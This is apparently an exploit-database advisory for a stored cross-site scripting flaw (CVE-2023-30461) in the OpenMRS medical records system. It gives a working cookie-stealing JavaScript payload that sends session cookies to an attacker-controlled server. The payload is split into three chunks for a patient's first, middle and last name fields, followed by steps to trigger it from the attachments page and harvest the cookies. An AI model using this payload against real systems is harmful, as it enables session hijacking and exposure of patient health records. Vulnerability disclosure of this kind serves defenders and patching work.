OpenMRS V2.4.2, 2.12.2 Stored XSS Vulnerabiltiy

ca Omar Tsai (CA) ca
Risk: Low
Local: No
Remote: Yes

# Exploit Title: OpenMRS XSS Vulnerability in Attachments # Date: 2023-04-09 # Exploit Author: Omar Tsai # Vendor Homepage: # Software Link: # Version: 2.4.2, 2.12.2 # Tested on: OpenMRS 2.4.2, 2.12.2 Standalone # CVE : CVE-2023-30461 # Proof-of-concept for XSS OpenMRS 2.4.2, 2.12,2 In this example, I will demonstrate a simple cookie-stealing attack using the three fields in a patient (First name, Middle name, and Last name). ## 1. Figure out the XSS payload ```sh <script>$.get(`https://<my_server>/?`+document.cookie);</script> ``` Now we have to split this into 50-character limited chunks since each name field is limited to 50 characters only. Note that the backtick is needed for quotes since quotations are escaped in the field. ## 2. Split up the XSS payload into 3 parts I will split the payload into 3 parts using a variable and the final jquery request: **For the first name:** ```sh <script>var a=`https://my-own`</script> ``` **For the middle name:** ```sh <script>a+=`-simpledomain.cp,/?`</script> ``` **For the last name:** ```sh <script>$.get(a+document.cookie);</script> ``` ## 3. Save the patient information Just click save ## 4. Execute XSS attack The XSS attack can be triggered by going to the `attachments` page of the patient. ## 5. Get cookies If you look back at your server logs, a GET request will have been initiated with the user's cookies

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top